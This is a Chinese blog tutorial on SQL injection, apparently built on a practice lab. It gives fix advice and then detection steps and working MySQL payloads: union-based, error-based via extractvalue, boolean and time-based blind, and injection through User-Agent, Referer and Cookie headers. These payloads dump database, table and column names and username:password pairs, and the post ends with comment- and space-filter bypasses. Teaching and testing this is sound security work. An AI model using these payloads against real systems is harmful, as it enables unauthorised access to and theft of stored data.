SQL注入漏洞知识总结

目录:

一、SQL注入漏洞介绍

二、修复建议

三、通用姿势

四、具体实例

五、各种绕过

 

 

一、SQL注入漏洞介绍:

      SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。

二、修复建议

  1. 使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤;
  2. 对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;
  3. 对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。

三、通用姿势

3.1 通过以下操作先大概判断是否存在注入点

  1. 如果参数(id)是数字,测试id=2-1与id=1返回的结果是否相同,如果做了2-1=1的运算,说明可能存在数字型注入。如果要用+号运算的话,因为URL编码的问题,需要把加好换成%2B,如id=1%2B1
  2. 在参数后面加单引号或双引号,判断返回结果是否有报错
  3. 添加注释符,判断前后是否有报错,如id=1' --+ 或 id=1" --+ 或id=1' # 或id=1" --+  (--后面跟+号,是把+当成空格使用)
  4. 有些参数可能在括号里面,如:SELECT first_name, last_name FROM users WHERE user_id = ('$id');所以也可以在参数后面加单双引号和括号,如id=1')  --+ 或 id=1") --+ 或id=1') # 或id=1") --+ 
  5. 参数后面跟or 或者and,判断返回结果是否有变化,如1' or 'a'='a  或者and 'a'='a或者1' or 'a'='b或者1' or '1'='2
  6.   如果返回的正确页面与错误页面都一样,可以考虑时间延迟的方法判断是否存在注入,如  1’ and sleep(5)

3.2 如果存在注入,利用注入获取信息

3.2.1 查询结果如果可以直接返回

利用联合查询一步步的获取信息,如:

 

// 获取数据库名称,注意联合查询要求前后查询的列数和数据类型必须对应
1' union select schema_name ,1 from information_schema.schemata --
//根据上一步获取的数据库名称,获取表名
1' union select table_name from information_schema.tables where table_schema='database_name'
//根据上面的数据库名称和表名获取字段名
1' union select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name'
//获取字段值,使用group_concat的目的是把查询结果合并成1列,另外,如果跨数据库查询值得花,需要使用数据库名.表明的格式,比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名

3.2.2 通过报错回显查询结果,如:

#利用报错回显查询到的值,回显当前的数据库名
and extractvalue(1,concat(0x7e,(select database())))
#回显表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' )))

#回显列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

3.2.3 布尔型注入,如:

 #判断数据库名的长度是多少
SELECT * FROM users where id ='1' and LENGTH(database())=8    

# 二分查找发挨个判断数据库名称的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select database()),1,1))>115   

#挨个判断此数据库中表的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116  

3.2.4 时间延迟注入,如:

 

and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) 

 

四、具体实例

4.1  字符型(参数在单引号内,直接返回结果)

 步骤1:参数后面加一个单引号报SQL错误

分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据

步骤2:构造payload 

 id=0' union select NULL,database(),NULL --+   #查询当前数据库的名称

#爆库名

id=0' union select null,group_concat(schema_name),null from information_schema.schemata --+

#爆表名

id=0' union select null,group_concat(table_name),null from information_schema.tables where table_schema='security' --+

#爆字段名

id=0' union select null,group_concat(column_name),null from information_schema.columns where table_schema='security' and table_name='users' --+

 

#获取数据库中的数据

id=0' union select null,group_concat(username,0x3a,password),null from security.users--+

 

4.2  数字型(直接返回结果)

 步骤1:id=1与id=2-1返回相同结果,数字型注入

步骤2:构造payload

无需引号闭合,id后面直接跟联合索引就行了

#爆库名

4.3  字符型(参数在单引号和括号内、直接返回结果)

步骤1:输入单引号报错,根据报错可知参数在单引号和括号内

步骤2:闭合查询

用单引号、括号和注释闭合查询,payload: id=1') --+

步骤3:各种爆,与上面的操作相同

4.4  布尔型(参数在单引内、不返回查询结果)

步骤1:输入单引号报错,根据报错得知参数在单引号内,构造id=1' --+返回正确页面,确认存在注入

步骤2:查询结果不返回,根据id=1' and 1=1 --+  与 id=1' and 1=2 --+返回结果不同,判断存在布尔型注入

步骤3:构造payload,先判断数据库名的长度,id=1' ' and LENGTH(database())=8 --+  值等于8的时候返回正确的页面,说明数据库长度为8

步骤4:通过二分查找法,挨个判断数据库名称的每个字母

id=1' and ascii(substr((select database()),1,1))>110  --+  #判断第一个字母的ascii是否大于110,返回正确页面,说明大于110
id=1' and ascii(substr((select database()),1,1))>118  --+  #判断第一个字母的ascii是否大于118,返回不正确页面,说明小与等于118
id=1' and ascii(substr((select database()),1,1))>115  --+  #判断第一个字母的ascii是否大于115,返回不正确页面,说明小与等于115
id=1' and ascii(substr((select database()),1,1))>113  --+  #判断第一个字母的ascii是否大于113,返回正确页面,说明大与113

id=1' and ascii(substr((select database()),1,1))>114 --+ #判断第一个字母的ascii是否大于114,返回正确页面,说明大与114

大于114,小于等于115,第一个字母的ascii值肯定就是115了,所以第一个字母就是s,依次类推可以查到剩下的所有字母。


4.5 布尔型(参数在单引内和两个括号内、不返回查询结果)
步骤1:输入单引号报错,但没有详细的报错提示

 

步骤2:增加1个括号也报错,增加2个括号返回正确

 

步骤3:布尔型,不返回查询结果,payload与上面的相同。

4.6 时间延迟注入(无论查询是否正确都返回一样的页面)

步骤1:如论输入什么,都返回一样的页面,所以考虑时间延迟注入

步骤2:直接1 and sleep(5) --+  没延迟,说明查询语句没有闭合成功

步骤3:猜测参数在单引号内,构造payload:id=1' and sleep(5) --+  页面相应延迟,存在注入

步骤4:构造payload,当数据库名长度为8的时候没有延迟,说明数据库名称的长度就是8

id=1'  AND IF(LENGTH(database())=8,1,sleep(10)) --+

 步骤5:通过如下方式,挨个判断数据库名的字母

 id=1'  and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+

 4.7 字符型报错注入(错误值被返回)

步骤1:按下面的测试,username字段存在字符型注入,参数在单引号内

步骤2:username字段输入一些无关的东西,SQL报错详情被回显

步骤3:利用extractvalue函数,让执行的结果以报错的方式显示出来

extractvalue(目标xml文档,xml路径),第二个参数的格式是/xxx/xx/xx/xx,如果格式不正确就会把报错显示出来

构造payload:uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+

 

 4.7 user-agent类型的注入

步骤1:user-agent的值被原封返回了

 

 步骤2:这里需要借助源码审计了,否则不容易猜到真实的sql语句。

如下源码所示,SQL语句是三个字段的insert语句,然后$uagent被返回。 

 

步骤3:结合报错注入,构造payload:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', extractvalue(1,concat(0x7e,(select database()))),'1') #

 

 4.8 Referer类型的注入
方法与上述相同,先闭合sql语句,然后利用报错返回,payload如下:

Referer: http://127.0.0.1/sql/Less-19/',extractvalue(1,concat(0x7e,(select database()))))#

 

 4.9 Cookie类型的注入

步骤1:输入单引号报错,确认属于cookie类型的注入,而且报错回显了,利用报错回显数据

步骤2:构造payload

Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select database()))) #

 

五、各种绕过

 5.1 注释符被过滤(--、#)

方法1:union查询中多加一个单引号以便闭合sql语句,比如:

id=0' union select null,database(),'null
id=0' union select null,group_concat(schema_name),null from information_schema.schemata union select null,null,'nul

 5.2 空格被过滤

方法1:使用/**/注释符代替空格

未完待续……

 

posted @ 2018-09-27 13:34  Eleven_Liu  阅读(17988)  评论(0编辑  收藏  举报